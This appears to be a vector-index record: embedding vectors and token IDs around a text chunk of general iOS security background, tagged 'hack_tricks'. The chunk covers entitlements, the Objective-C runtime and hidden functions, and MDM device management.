0.5319861173629761, 0.8281555771827698, 0.07408379018306732, -0.452711820602417, -0.19659660756587982, -0.1919584572315216, 0.9780446290969849, 0.09911185503005981, 0.5737406611442566, 0.2787638306617737, -0.8360773324966431, 0.1944010853767395, -0.3105909824371338, 0.12412696331739426, -0.38144755363464355, 0.06391847133636475, -0.1803908497095108, 0.30879709124565125, 0.10390497744083405, 0.22166794538497925, 0.2524624466896057, -0.31945714354515076, 0.4870884120464325, 0.21308587491512299, 0.595328152179718, -0.7406235337257385, 0.0772610604763031, -0.017505476251244545, -0.024233508855104446, 0.7534350752830505, 0.34200575947761536, -0.03725114464759827, -0.04407188668847084, 0.5480698943138123, -0.39174628257751465, -0.18616147339344025, 0.41245946288108826, -0.022182706743478775, -0.4334459602832794, 0.0457395501434803, 0.2389451265335083, -0.5480731129646301, -0.02958289533853531, -0.2289033979177475, 0.03584123030304909, 0.17541718482971191, 0.20726752281188965, -0.14126238226890564, 0.10782504826784134, 1.201430082321167, -0.8907274603843689, 0.8146063685417175, 0.49805793166160583, -0.023316476494073868, -0.0004868752439506352, -0.6249197125434875, -0.5968665480613708, 0.6045618653297424, 0.788374125957489, 0.3855936825275421, 0.2069532871246338, 0.6598001718521118, -0.053546883165836334, -0.28338348865509033, 0.5513960719108582, -0.23489290475845337, -0.8850988149642944, 0.11304155737161636, 0.0617566742002964, -0.3284521698951721, -0.7319265604019165, 0.3586379885673523, 0.30538591742515564, -0.6942816972732544, 0.6923034191131592, -0.5236114263534546, 0.09376528114080429, -0.11899979412555695, 0.06262674182653427, 0.11660957336425781, -0.03493715822696686, 0.7539049386978149, 0.02700369618833065, -0.91344153881073, 0.3730008900165558, -0.17330829799175262, 0.6057099103927612, -0.2448395937681198, 0.18986192345619202, 0.35342058539390564, 0.41270312666893005, -0.10880503803491592, -0.3493441939353943, -0.4860316216945648, -0.10516086965799332, -0.4651995897293091, -0.04154643416404724, 0.25059595704078674, -0.13894067704677582, 0.4509226679801941, -0.5574675798416138, 0.02349873259663582, -0.16407178342342377, 0.20322205126285553, -0.16664431989192963, -0.09628733992576599, -0.00764429522678256, 0.025516288354992867, 0.05194772034883499, -0.11402645707130432, -0.16499175131320953, -0.15816937386989594, 0.6983658075332642, -0.38702499866485596, -0.28753331303596497, -0.4334738850593567, 0.08210788667201996, 0.22102046012878418, 0.512610137462616, -0.35709717869758606, -0.18463701009750366, -0.0007055947789922357, -1.0370551347732544, -0.5248678922653198, -0.10340002179145813, -0.06917334347963333, 0.08895792067050934, 0.35815539956092834, -0.17811685800552368, 0.16677382588386536, 0.30945974588394165, -0.4821661412715912, -0.5532682538032532, -0.1491762399673462, 0.44189465045928955, -0.22258885204792023, 0.5111003518104553, 0.3245198726654053, 0.28978192806243896, 0.26069772243499756, -0.25584113597869873, 0.8877048492431641, -0.6821105480194092, -0.11736634373664856, -0.35001620650291443, -0.5660134553909302, -0.5313636064529419, -0.15276135504245758, -0.11329852789640427, 0.14111760258674622, 0.012430292554199696, 0.1363651603460312, -0.20813606679439545, 0.30777767300605774, -0.8447832465171814, 0.26762863993644714, -0.22379028797149658, -0.2492627501487732, 0.4064357876777649, 0.15175141394138336, 0.4783788025379181, -1.1313316822052002, 4.484055995941162, 0.6207078695297241, 0.043487388640642166, -0.007941842079162598, -0.10494779050350189, 0.4503564238548279, 0.5655564069747925, -0.8047835230827332, 0.18375495076179504, -0.7587071061134338, 0.18297551572322845, -0.15249398350715637, 0.373452365398407, 0.5706021189689636, 0.16170337796211243, 0.018178528174757957, -0.2509417235851288, 0.03957628831267357, 0.4296457767486572, -0.9367735385894775, -0.58769291639328, -0.15096049010753632, -0.20974497497081757, 0.7121492028236389, -0.13971076905727386, 0.6728663444519043, 0.596945583820343, -0.9413437843322754, 0.19701442122459412, -0.14782871305942535, 0.03558751195669174, -0.6670103073120117, 0.3573295474052429, -0.577333390712738, -0.8207514882087708, 0.3084147870540619, 0.12362527847290039, -0.8784591555595398, -0.6732059121131897, 0.2797352373600006, 0.32137995958328247, 0.35801389813423157, -0.042558588087558746, 0.02073861099779606, 0.3596423864364624, 0.6947090029716492, -0.06254462897777557, 0.3441386818885803, 0.8994280695915222, -0.7134143710136414, 0.36595991253852844, 0.05276188999414444, 0.14822052419185638, 0.23397643864154816, -0.5614258050918579, 0.2984170913696289, -0.05570757016539574, -0.3690684735774994, 0.24852024018764496, 0.5238418579101562, 0.23891642689704895, -0.6592581272125244, 0.2661500573158264, -0.6733036637306213, -0.8732104897499084, 0.823647141456604, 0.2747064530849457, 1.2110542058944702, 0.2651194930076599, -0.4334142506122589, -0.5518365502357483, -0.6485602259635925, -1.0745437145233154, -0.9932135939598083, 0.655127227306366, -0.3729971647262573, 0.6209255456924438, 0.15669357776641846, 0.35162830352783203, -0.8948849439620972, -0.22073853015899658, 0.08504027873277664, -0.8409112691879272, 0.38258081674575806, 0.8432158827781677, 0.6390619277954102, 0.31874027848243713, -0.5730064511299133, 0.21737967431545258, -0.0964883342385292, 0.33812201023101807, 0.46296197175979614, -0.5988256931304932, 0.040618136525154114, 0.19294780492782593 ]
[ 2923, 6309, 1010, 2788, 4566, 2007, 8192, 6155, 23235, 3258, 1024, 1026, 20228, 2923, 2544, 1027, 1000, 1015, 1012, 1014, 1000, 1028, 1026, 4487, 6593, 1028, 1026, 3145, 1028, 24978, 4135, 10719, 2860, 10222, 13429, 10600, 18655, 2229, 23235, 3258, 1026, 1013, 3145, 1028, 1026, 5164, 1028, 2115, 3295, 2003, 2109, 2000, 3073, 2735, 1011, 2011, 1011, 2735, 7826, 2000, 2115, 7688, 1012, 1026, 1013, 5164, 1028, 5080, 9859, 24844, 6610, 9859, 2024, 2109, 2011, 1996, 10439, 3573, 2000, 5676, 2008, 2069, 11892, 5733, 2024, 3205, 1998, 3568, 2024, 3039, 2000, 8816, 1996, 10439, 1012, 2027, 2024, 9675, 1999, 1996, 18558, 1012, 20228, 2923, 5371, 1997, 1996, 10439, 2104, 1996, 21318, 2890, 15549, 5596, 24844, 6610, 17695, 28518, 15909, 3111, 3145, 1012, 1026, 3145, 1028, 21318, 2890, 15549, 5596, 24844, 6610, 17695, 28518, 15909, 3111, 1026, 1013, 3145, 1028, 1026, 9140, 1028, 1026, 5164, 1028, 2849, 2615, 2581, 1026, 1013, 5164, 1028, 1026, 1013, 9140, 1028, 4050, 2017, 1005, 2222, 2424, 1996, 2849, 2615, 2581, 10673, 1010, 3574, 2008, 1996, 10439, 2003, 9227, 2069, 2005, 1996, 2849, 2615, 2581, 7899, 2275, 1010, 2030, 2065, 2009, 1521, 1055, 1037, 3590, 1013, 4185, 1011, 2978, 5415, 10439, 1012, 2005, 2742, 1010, 2019, 10439, 2453, 2022, 3294, 7790, 2006, 22309, 2000, 2147, 1006, 1041, 1012, 1043, 1012, 1037, 1000, 22309, 6415, 8068, 1000, 10439, 1007, 1012, 2429, 2000, 1996, 9749, 16380, 5080, 21778, 4431, 1010, 22309, 2003, 2069, 2800, 3225, 2006, 1996, 18059, 1021, 1006, 1998, 16380, 2340, 1007, 1012, 1037, 9722, 2453, 2215, 2000, 23329, 2035, 25876, 5733, 2011, 4292, 1996, 22309, 5080, 10673, 1012, 4372, 3775, 24007, 5054, 3775, 24007, 2015, 2024, 3145, 3643, 7689, 2008, 2024, 2772, 1999, 2000, 2019, 10439, 1998, 3499, 27280, 3458, 2448, 7292, 5876, 1010, 2066, 19998, 5310, 8909, 1012, 2144, 4372, 3775, 24007, 2015, 2024, 18397, 2772, 1010, 2027, 2064, 1521, 1056, 2022, 2904, 1012, 4372, 3775, 24007, 2015, 2024, 2109, 8077, 2011, 2291, 18726, 1998, 12828, 2015, 2000, 4685, 3563, 21598, 3136, 2008, 2052, 4728, 5478, 1996, 2832, 2000, 2448, 2004, 7117, 1012, 2023, 6551, 13416, 1996, 4022, 2005, 14293, 9686, 25015, 3508, 2011, 1037, 20419, 2291, 10439, 2030, 12828, 1012, 2005, 2742, 1010, 2065, 2017, 2215, 2000, 2275, 1996, 1000, 12398, 2951, 3860, 1000, 10673, 1010, 2017, 2052, 2342, 2000, 2175, 2000, 1996, 9859, 21628, 1999, 1060, 16044, 1998, 9585, 2951, 3860, 1012, 2023, 2003, 3495, 2517, 2011, 1060, 16044, 2000, 1996, 1026, 10439, 18442, 1028, 1012, 4372, 3775, 24007, 2015, 5371, 2004, 1996, 4012, 1012, 6207, 1012, 9722, 1012, 12398, 1011, 2951, 1011, 3860, 4372, 3775, 24007, 2007, 12398, 3643, 24978, 8873, 2571, 21572, 26557, 3508, 9006, 10814, 2618, 1012, 1999, 1996, 24531, 2057, 2453, 2424, 2023, 1999, 1996, 11157, 1012, 4684, 21572, 17084, 2004, 1024, 1026, 3145, 1028, 4372, 3775, 24007, 2015, 1026, 1013, 3145, 1028, 1026, 4487, 6593, 1028, 1012, 1012, 1012, 1026, 3145, 1028, 4012, 1012, 6207, 1012, 9722, 1012, 12398, 1011, 2951, 1011, 3860, 1026, 1013, 3145, 1028, 1026, 5164, 1028, 24978, 8873, 2571, 21572, 26557, 3508, 9006, 10814, 2618, 1026, 1013, 5164, 1028, 1026, 1013, 4487, 6593, 1028, 2005 ]
hack_tricks
430.txt
5
other capabilities such as healthkit, the user has to be asked for permission, therefore it is not enough to add the entitlements, special keys and strings have to be added to the info. plist file of the app. objective - c and swift basicsobjecttive - c has a dynamic runtime, so when an objective - c program is executed in ios, it calls libraries whose address are resolved at runtime by comparing the name of the function sent in the message against a list of all the function names available. at the beginning, only apps created by apple run the iphones, so they had access to everything as they were trusted. however, when apple allowed third party applications, apple just removed the headers files of the powerful functions to " hide " them to developers. however, developers found that " safe " functions needed a few of these undocumented functions and just creating a custom header file with the names of the undocumented functions, it was possible to invoke this powerful hidden functions. actually, apple, before allowing an app to be published, check if the app calls any of these prohibited functions. then, swift appeared. as swift is statically bound ( it doesn't resolve the address of the functions in runtime like objective - c ), it can be checked more easily the calls a swift program is going to make via static code analysis. device managementfrom ios version 6, there is built - in support for device management capability with fine grain controls that allows an organisation to control the corporate apple devices. the enrolment can be initiated by the user installing an agent in order to access the corporate apps. in this case the device usually belongs to the user. or the company can indicate the serial numbers of the bought devices or the purchase order id and specify the mdm profile to install on those devices. note that apple doesn't allow to enrol a particular device this way twice. once the first profile is deleted the user needs to give consent to install another one. the user can see the installed policies in settings - - > general - - > profile and device managementas these mdm policies are checking and limiting other applications, they are running with more privileges. a mdm policy can enforce users to have a passcode set with a minimun password complexity. the profiles are tied to the deviceid, signed and encrypted by the mdm server and tamper proof. they cannot be removed without losing all the corporate data. mdm profiles allow to wipe all
[ 0.1035207211971283, -0.6024580001831055, -0.07213390618562698, 0.45738717913627625, -0.12442538142204285, -0.5384507775306702, 0.23844459652900696, 0.33098113536834717, 0.23344896733760834, 0.6929012537002563, 0.27956998348236084, 0.636012077331543, 0.4276789724826813, -0.22851447761058807, -0.4896758496761322, -0.38412609696388245, -1.0499260425567627, 0.04003110155463219, -0.39742645621299744, 0.06843987852334976, 0.6328830122947693, -0.2124219536781311, -0.7883589267730713, -0.6906659007072449, -0.6590480208396912, 0.6491262316703796, 0.8880140781402588, -0.16491806507110596, 0.42757293581962585, 0.844432532787323, 0.07510911673307419, 0.10880862921476364, 0.08521715551614761, -0.5152657628059387, -0.17259517312049866, -0.08614715188741684, 1.028257131576538, -0.48726996779441833, 0.18825294077396393, -0.46104922890663147, 0.316333144903183, -0.05741220712661743, 0.20521603524684906, -0.5332674980163574, -0.5379272103309631, -0.5465333461761475, 0.8724361658096313, -0.2182895392179489, 0.07836960256099701, 0.3002548813819885, 0.38033291697502136, -0.10711619257926941, -0.20027633011341095, 0.4835900664329529, 0.16755139827728271, 0.3294912576675415, 0.19807711243629456, -0.14856962859630585, -0.26683303713798523, 0.950713574886322, -0.4107058346271515, 0.4963601529598236, 0.7120633125305176, -0.863740861415863, 0.3007333278656006, -0.06612776964902878, -0.08740741014480591, -0.4282171428203583, -0.21699491143226624, -0.3661925196647644, 0.3118898570537567, 0.3584313690662384, -1.0530471801757812, -0.6979402303695679, -0.49292171001434326, -0.2836697995662689, -0.04238245263695717, -0.5594157576560974, 0.134071484208107, 0.3931233286857605, 0.4219135642051697, -0.14133040606975555, -0.2263878881931305, 0.07023906707763672, -0.453690767288208, 0.3792567849159241, 0.42849430441856384, 0.8643659353256226, -0.7502046227455139, 0.16781622171401978, 0.4944928288459778, 0.009158275090157986, -0.4526920020580292, -0.5066113471984863, 0.5560663342475891, 1.0399610996246338, -0.2173498421907425, -0.282747358083725, -0.0936572328209877, -0.5328075289726257, 1.149835467338562, 0.46007898449897766, -0.019010931253433228, 0.1062559261918068, -0.6526185274124146, 0.9936975836753845, 0.42552831768989563, -0.022904377430677414, -0.20702829957008362, -0.476785808801651, 0.1477448046207428, -0.31169092655181885, 0.19078128039836884, -1.0508402585983276, -0.4399636685848236, 0.2621862292289734, 0.6470333933830261, -0.4418943524360657, -0.7526484727859497, 1.1617186069488525, 0.06494253873825073, -0.059175167232751846, 0.27932700514793396, 0.18194495141506195, 0.3978199064731598, 0.2188422828912735, 0.36950889229774475, 1.159023404121399, -0.7190572619438171, 0.09083368629217148, -0.3088550567626953, 0.30546870827674866, 0.037907011806964874, 1.0972474813461304, -0.592710018157959, 0.16194583475589752, -0.04609590768814087, -0.0038053567986935377, 0.4353873133659363, -0.9855210185050964, -0.0894959568977356, -0.06959272176027298, 0.1425291895866394, 0.966134250164032, 0.08840933442115784, -0.9696401357650757, -0.5721009969711304, -0.6964854598045349, -0.15577584505081177, -0.08831200003623962, 0.22906649112701416, 0.06736806780099869, 0.8705379962921143, -0.28253844380378723, -0.5982654690742493, 0.0960446298122406, -0.2563186287879944, 0.5185301899909973, 0.010722886770963669, -0.05364468693733215, -0.18367205560207367, 0.8291935324668884, 0.1234484612941742, 0.657016932964325, -0.4191095232963562, -0.34703004360198975, -0.5072526335716248, -0.30494070053100586, 0.03555388003587723, 0.2243058979511261, -0.13354618847370148, -0.13257534801959991, -0.23472405970096588, -0.018599145114421844, 1.7302793264389038, 1.061117172241211, 0.21898910403251648, -0.04054490849375725, 0.4940173029899597, 0.5130839943885803, -0.9214010834693909, 0.34502092003822327, 0.2522307336330414, 0.7555513381958008, -0.20886075496673584, 0.14304542541503906, -0.38386720418930054, -0.6877539753913879, -0.06560695171356201, -0.12099789083003998, -0.3943099081516266, 0.23432880640029907, -0.3401595950126648, 0.6547566056251526, 0.5620473027229309, -0.178496316075325, -1.1045598983764648, -0.11412905901670456, 0.014860968105494976, -1.49659264087677, -0.5852093696594238, 0.11232933402061462, 0.26202473044395447, 0.5655078887939453, -0.7060900330543518, 0.30122554302215576, 0.39487046003341675, 0.8525973558425903, -0.4368080794811249, 0.8400360345840454, 0.32457801699638367, -0.21544694900512695, -0.18777811527252197, 0.25880277156829834, -0.36619478464126587, -0.18794380128383636, -0.45372989773750305, 0.10113739967346191, -0.016825292259454727, -0.1365097314119339, -0.2910756468772888, 0.4001707136631012, 1.0466670989990234, 0.6155418157577515, -0.23298291862010956, -0.20247989892959595, 0.41030430793762207, 0.12846478819847107, -0.5708240866661072, -0.042654260993003845, -0.16051435470581055, 0.7636829018592834, 0.43156057596206665, 1.2284413576126099, -0.1409335881471634, -0.4625747799873352, -0.0859730988740921, -0.12589025497436523, 0.7715624570846558, 0.09378121048212051, 0.1492251604795456, 0.5900033116340637, 0.8938847780227661, 0.09840036928653717, 0.13204491138458252, 0.21020735800266266, 0.3349626064300537, -0.07140324264764786, 0.7945767045021057, 0.7282479405403137, -0.05630268156528473, 0.5539018511772156, 0.554059624671936, -0.4117127060890198, -0.936181366443634, -0.43294817209243774, 0.9307921528816223, 1.1390260457992554, -0.23071804642677307, -0.7702333331108093, 0.17100054025650024, 0.023443937301635742, -0.09017083048820496, 0.15418851375579834, 0.03854776546359062, 0.07104850560426712, 0.08603443205356598, 0.49800971150398254, -0.3453565835952759, -0.7696173191070557, -0.7309206128120422, -0.4070281684398651, -0.6023281216621399, -0.7357828617095947, -0.6227394342422485, 0.2002265900373459, 0.24424897134304047, -0.12935501337051392, 0.9184755682945251, -0.40636083483695984, -0.5845640897750854, 0.6047869920730591, 0.5488593578338623, 0.5869831442832947, -0.3503807485103607, 0.09165968745946884, -0.9821481108665466, 0.34485286474227905, -0.4309636950492859, 1.0033509731292725, 0.23734459280967712, 0.09669511765241623, -0.30924588441848755, -0.008693288080394268, -0.12503251433372498, -0.47598204016685486, 0.31597697734832764, 0.4824853241443634, -1.0111870765686035, -0.01455674134194851, 0.09504365175962448, 0.4255259037017822, 0.4016888439655304, -0.09330809116363525, -0.44425487518310547, 0.9633321166038513, -0.07032983750104904, -0.6797890663146973, 0.7466003894805908, 0.06218114122748375, -0.7701746225357056, 0.19999918341636658, 0.03858465328812599, 0.22029641270637512, -0.42536529898643494, -0.4717726409435272, 0.20937438309192657, 0.02971254289150238, 0.25061988830566406, -0.1186809241771698, 0.10707408934831619, -1.0050629377365112, -0.2372741848230362, 0.02269471064209938, -0.4526436924934387, 0.007439270615577698, 0.09256705641746521, -1.1794542074203491, 0.44472524523735046, -0.4522459805011749, -0.16045807301998138, -0.3516194820404053, -0.012930827215313911, 0.734636664390564, 0.1864791065454483, -0.05682290345430374, 0.01739722117781639, -0.2727821171283722, 0.29057392477989197, -0.048626858741045, 0.061705972999334335, -0.6797354817390442, 0.06633321195840836, 0.005578089505434036, 0.017379241064190865, 1.0452507734298706, 0.48819616436958313, -0.7147760987281799, -0.3802797794342041, -0.26026201248168945, -0.40851131081581116, -0.18250475823879242, -0.34110209345817566, -0.008105478249490261, 0.11810756474733353, 0.9379668235778809, -0.22918185591697693, -0.5587793588638306, 0.10456185042858124, -0.2270827740430832, 0.266390860080719, -0.10588029026985168, 0.17851167917251587, 0.061117712408304214, -0.462054580450058, -0.16063040494918823, -0.19625692069530487, 0.13680574297904968, 0.27862781286239624, 0.04484705254435539, 0.5392472147941589, -0.08862948417663574, 0.05767356604337692, 0.32888826727867126, -0.5962257385253906, -0.6534894108772278, 0.4330395758152008, 0.09466025233268738, 0.7076735496520996, -0.4329105615615845, 0.176292285323143, -0.34068945050239563, -0.42419490218162537, 0.6648306846618652, 0.19479109346866608, -0.19236621260643005, -0.8663744330406189, -0.26575660705566406, -0.2458321750164032, 0.27816343307495117, -0.014355718158185482, -0.014375840313732624, -0.15155047178268433, -0.3606134057044983, -0.7814846038818359, -0.6283566951751709, 0.277230829000473, 0.7368178963661194, 0.41814881563186646, 0.6697577238082886, 0.8466827869415283, 0.34016770124435425, -1.2084444761276245, 0.5960714221000671, -0.7999452352523804, 0.1437295526266098, -0.23699791729450226, 0.684769868850708, 0.012038394808769226, 0.06579221785068512, -0.3281078338623047, 0.16832919418811798, 0.03133198618888855, -0.8559361696243286, 0.38921797275543213, 0.11011797189712524, -0.3145149052143097, -0.6848423480987549, 0.01178938802331686, 0.30358755588531494, -0.5635954737663269, -0.03811067342758179, -0.03471166640520096, 0.2611713409423828, 0.18293215334415436, -0.4261050522327423, -0.04046350345015526, -0.5815193057060242, 0.47223392128944397, 0.49475565552711487, 0.007075471803545952, -0.5935242176055908, -0.23173268139362335, -0.4577570855617523, -0.5149531364440918, 0.13783012330532074, 0.5495378375053406, 0.43390077352523804, 0.07456282526254654, -0.6645788550376892, -0.47775349020957947, 1.0614241361618042, -0.4395661950111389, -0.05511563643813133, -0.23636138439178467, 0.008093578740954399, 0.38917598128318787, 0.49079644680023193, 0.15008780360221863, 0.039620086550712585, 0.6563552021980286, -0.3628649115562439, 0.9970049858093262, -0.3721890449523926, -0.2349964827299118, -0.40249887108802795, 0.027497055009007454, -0.09562541544437408, 0.2172262817621231, -0.5250359773635864, 0.4137938916683197, 0.02722933329641819, 0.07140107452869415, 0.003982284106314182, -0.036752816289663315, 0.8452332019805908, -0.05402219668030739, -0.4162612855434418, 0.07155624777078629, 0.5299050211906433, 0.38884443044662476, 0.21321381628513336, -0.4052242636680603, -0.14537151157855988, 0.5825245380401611, -0.4068027436733246, 0.7883892059326172, 0.39895400404930115, -0.5302614569664001, -0.547103226184845, -0.31523597240448, 0.26774388551712036, 0.21275557577610016, 0.7504513263702393, -1.1420265436172485, -0.014153138734400272, -0.11408878862857819, 0.11074400693178177, -0.04842343553900719, 0.7722904682159424, -0.2432626187801361, 0.3080155849456787, 0.28118425607681274, 0.4273790717124939, -0.20304982364177704, -0.5459216833114624, -0.4360045790672302, -0.4318787157535553, -0.1058729737997055, -0.7113482356071472, 0.8794196844100952, 0.01685081422328949, -0.28838175535202026, 0.7408508658409119, -0.18311913311481476, 0.19002096354961395, -1.3548141717910767, -0.29142460227012634, -0.40729984641075134, 0.15721112489700317, -0.19122432172298431, 0.04418003186583519, -0.04904741421341896, -0.09598162770271301, -0.06844986230134964, 0.3598003685474396, 0.3407715857028961, -0.10826706141233444, -0.3537385165691376, 0.47689852118492126, 0.40221095085144043, 0.06077931076288223, -0.5476750135421753, 0.5292016863822937, -0.7011744976043701, -0.5012150406837463, -0.7526645064353943, -0.4914088547229767, -0.5970471501350403, -1.132659912109375, -0.149700328707695, -0.508005678653717, 0.6660735011100769, -0.6781392693519592, -0.3989669680595398, -0.08750338852405548, 0.35907256603240967, -0.012796535156667233, -0.7752346396446228, -0.6759680509567261, 0.05291927605867386, 0.56640625, -0.29719078540802, 0.053810570389032364, -0.5605711340904236, -0.4868547022342682, 0.10333146899938583, 0.7965860962867737, 0.029950907453894615, 0.015532223507761955, -0.0006779041141271591, -0.24512985348701477, 0.599224328994751, 0.0689917802810669, -0.9224703907966614, -0.2700878381729126, -0.4137221872806549, -0.2717818021774292, 0.2742076516151428, 1.3605194091796875, -0.3748243451118469, 0.6895228028297424, -0.06905968487262726, -0.0007835499127395451, 0.3097529113292694, -0.46258285641670227, -0.2939152717590332, -0.5724553465843201, 0.7395023107528687, -0.753777801990509, -0.45233482122421265, -0.3358216881752014, 0.8090522885322571, 0.5504588484764099, 0.2353653758764267, -0.8279209136962891, 1.0936471223831177, -0.5357690453529358, -1.0215638875961304, 0.32687193155288696, -0.093918077647686, 0.2670639455318451, 0.1171344742178917, -0.18624746799468994, 0.5551097989082336, -0.37415337562561035, 0.17125165462493896, 0.7291168570518494, 0.7032511234283447, 0.24017222225666046, -0.02387593686580658, 0.4762882590293884, 0.280689537525177, 0.016778914257884026, 0.7549695372581482, -0.11684514582157135, 0.5370965003967285, -0.2830542027950287, -0.4780508577823639, 0.2494562566280365, -0.6676151752471924, -0.28987759351730347, 0.45822879672050476, -0.1400151401758194, -0.04426002502441406, 0.023305734619498253, -0.8321734666824341, -0.05768410861492157, -0.0018795185023918748, -0.5622098445892334, -0.1365538388490677, 0.4166817367076874, 0.7775571942329407, -0.13909828662872314, 0.05577036738395691, 0.08703043311834335, -0.036208342760801315, -0.17585328221321106, 0.42533814907073975, -0.22161847352981567, -0.7838616371154785, 1.0564117431640625, 0.5604291558265686, -1.0078682899475098, -0.23145397007465363, -0.4719575047492981, -0.47867831587791443, 0.1430477350950241, -0.4172865152359009, -0.21147693693637848, 0.6758536696434021, 0.11839959770441055, 0.6610708236694336, 0.5418937802314758, 0.34263598918914795, 0.057436585426330566, -0.8698589205741882, 0.9273676872253418, 0.21733862161636353, 0.20414289832115173, 0.6393193006515503, -1.0170458555221558, -0.9368313550949097, -0.1453208476305008, 0.5420096516609192, 0.526067316532135, 0.2392701506614685, 1.2359081506729126, -0.17552529275417328, -0.3440479040145874, -0.13266558945178986, -0.08192130923271179, -0.3663925230503082, -0.07127752155065536, -0.19727005064487457, 1.3874943256378174, 0.21565380692481995, -0.19601179659366608, -0.37066757678985596, 0.3920477330684662, 0.4387746751308441, 0.3564082682132721, 0.264766663312912, -0.19906160235404968, -0.4711044132709503, 0.6928673386573792, -0.0490218922495842, -0.09937102347612381, -0.9772825241088867, -0.7021723985671997, -0.23705552518367767, 0.5768401026725769, -0.001743099419400096, 0.1462804675102234, 0.1545352041721344, -0.017625434324145317, -0.5953263640403748, -0.411251962184906, 0.11032675951719284, -0.675524115562439, -0.009423144161701202, -0.2769930958747864, 0.6890292763710022, -0.27822020649909973, -0.5618281960487366, -0.3413114845752716, -0.2832215130329132, -0.5282137989997864, -0.4156688153743744, -0.8159425258636475, 0.0397651307284832, -0.11698158830404282, 0.511559247970581, -0.9069676399230957, -0.9425781965255737, -0.36602073907852173, -0.600862979888916, -0.09152112156152725, 0.543002724647522, 0.1211528554558754, -0.13967742025852203, -0.01547760609537363, 0.4885913133621216, -0.07587745040655136, -0.8107315301895142, 0.4077604115009308, 0.11927048116922379, 0.04777408763766289, -0.31241095066070557, 0.3624708354473114, -0.5512177348136902, -0.14386099576950073, 0.011404020711779594, -0.29709288477897644, 0.2642076015472412, -0.7020742297172546, 0.24422453343868256, 0.4060659110546112, -0.13928785920143127, 0.40834781527519226, 0.5984106659889221, 0.4641859233379364, 0.45605984330177307, -0.287947416305542, 0.19670361280441284, 0.4910459518432617, -0.21278077363967896, 0.39698219299316406, 0.18990042805671692, 0.3311077058315277, -0.46552783250808716, -0.7390301823616028, -0.18012528121471405, -0.5707255601882935, 0.17836713790893555, 0.412248820066452, 0.05352459475398064, -0.474006325006485, 0.11667192727327347, 0.5360870957374573, 0.3878727853298187, 0.6359875798225403, 0.10170488804578781, 0.80867600440979, 0.19792787730693817, -0.7721015214920044, -0.4930383861064911, -0.9451867341995239, -0.18685145676136017, 0.2677340805530548, -0.08791106939315796, -0.2738347351551056, -0.4336336553096771, -0.11309827119112015, -0.2503083348274231, -0.15840744972229004, -0.06389661133289337, 0.2916131913661957, 0.3534260392189026, -0.42245832085609436, 0.18692618608474731, -0.6618579030036926, -0.8592376112937927, -0.30946746468544006, 0.5367587804794312, -0.5357459783554077, -0.8475433588027954, 0.9558643698692322, 0.7421848773956299, 0.13530077040195465, 0.07681160420179367, -0.430813193321228, -0.3801054358482361, -0.04141619801521301, 0.47635698318481445, 0.4450060725212097, 0.18563152849674225, -0.9302974939346313, 0.06912429630756378, -0.5751121044158936, 0.2110251933336258, -0.1290210485458374, 0.3649619221687317, 0.017058584839105606, 0.14267583191394806, -0.5089123249053955, 0.19472867250442505, 0.34830987453460693, 0.1525222808122635, 0.6564825773239136, 0.21392764151096344, 0.6938031315803528, -0.5335761308670044, 0.1290348321199417, -0.16463930904865265, 0.3120763301849365, 0.13392166793346405, -0.4215998649597168, -0.4849216639995575, -0.11728772521018982, 0.06510285288095474, -0.1751076877117157, 0.12007489055395126, 0.295383095741272, -0.06547566503286362, -0.6201066970825195, -0.14166752994060516, -0.27692386507987976, 0.18093377351760864, -0.1372923105955124, -1.0381520986557007, 0.1930549442768097, 0.11067397147417068, 0.469931960105896, -0.04600183665752411, 0.06218957528471947, 0.6444732546806335, -0.4487028419971466, 0.6358097195625305, -0.009102116338908672, 0.2275494486093521, 0.26292118430137634, 0.1108749657869339, -0.4581312835216522, 0.6244364380836487, 1.1222443580627441, 0.47190144658088684, 0.1963745504617691, 0.644619882106781, 0.058547910302877426, -0.22654540836811066, 1.2766320705413818, -0.4943523705005646, -0.9508216381072998, 0.2123061567544937, 0.13246864080429077, -0.8393691778182983, -1.3862099647521973, 0.15566521883010864, 0.47328653931617737, -0.4716128706932068, 0.3082139790058136, -0.2641805410385132, 0.21706107258796692, -0.7626416683197021, 0.604584276676178, -0.3419014811515808, 0.06544401496648788, 0.5409568548202515, -0.5126787424087524, -0.7994363903999329, 0.5331019163131714, 0.050021372735500336, 0.10297253727912903, -0.17545457184314728, -0.03279084712266922, -0.01922810822725296, 0.15606960654258728, 0.23844464123249054, -0.5807657241821289, -0.7813990712165833, 0.06415997445583344, 0.06460883468389511, -0.5727822780609131, 0.3683667778968811, -0.2289942055940628, 0.554514467716217, 0.34486088156700134, -0.006008042022585869, -0.194210022687912, -0.43225160241127014, -0.24582414329051971, -0.806098461151123, -0.5361672639846802, 0.37321627140045166, -0.5547193884849548, -0.0995766669511795, -0.5538784265518188, -0.012953270226716995, 0.7779546976089478, 0.16511885821819305, -0.3638313114643097, -0.3886619210243225, -0.4920785427093506, -0.030133547261357307, 1.037198781967163, -0.47939684987068176, -0.16529034078121185, -0.08978491276502609, -0.43477779626846313, -0.9143121242523193, -0.14638450741767883, -0.6108148694038391, -0.08821657299995422, 0.8202572464942932, 0.33137181401252747, 0.6000596880912781, 0.4845466911792755, -0.39004945755004883, -0.34761184453964233, 0.5632802844047546, 0.7232581377029419, -0.508041262626648, 0.4089192748069763, 0.10730378329753876, -0.23858137428760529, 0.26601243019104004, -0.9331521391868591, 0.8739344477653503, -0.26836591958999634, -0.6726062893867493, -0.7423297166824341, -0.246327742934227, -0.9729160070419312, -0.2572636008262634, 0.28313300013542175, 0.12683238089084625, 0.016946077346801758, -0.14301960170269012, -1.1124712228775024, 0.3074963092803955, -1.0889647006988525, 0.4583384692668915, 0.008009704761207104, 0.3121345341205597, 0.4363900125026703, 0.5294208526611328, 0.9743635058403015, -1.3909382820129395, 4.334079742431641, 0.927785336971283, 0.24298007786273956, 0.5634763240814209, 0.33744367957115173, 0.44366759061813354, 1.3112437725067139, -0.462799996137619, 0.38420385122299194, -0.8004258275032043, 0.06793021410703659, -0.08032979816198349, 0.19939863681793213, 0.3791479766368866, 0.20092658698558807, -0.10536785423755646, -0.032567769289016724, 0.2880097031593323, 0.15278713405132294, -0.8222184777259827, -1.354987621307373, -0.07593299448490143, 0.4330672323703766, 0.7694177627563477, -0.09991032630205154, 0.17197422683238983, 0.47377654910087585, -0.5881494283676147, -0.28260985016822815, -0.2908208668231964, -0.21646292507648468, -0.45750024914741516, 0.4149337410926819, -0.6474307775497437, -0.4757387638092041, 0.5038828253746033, 0.48255568742752075, -0.1490492969751358, -0.81661456823349, 0.24195589125156403, 0.10601024329662323, 0.1262015402317047, -0.0040024458430707455, 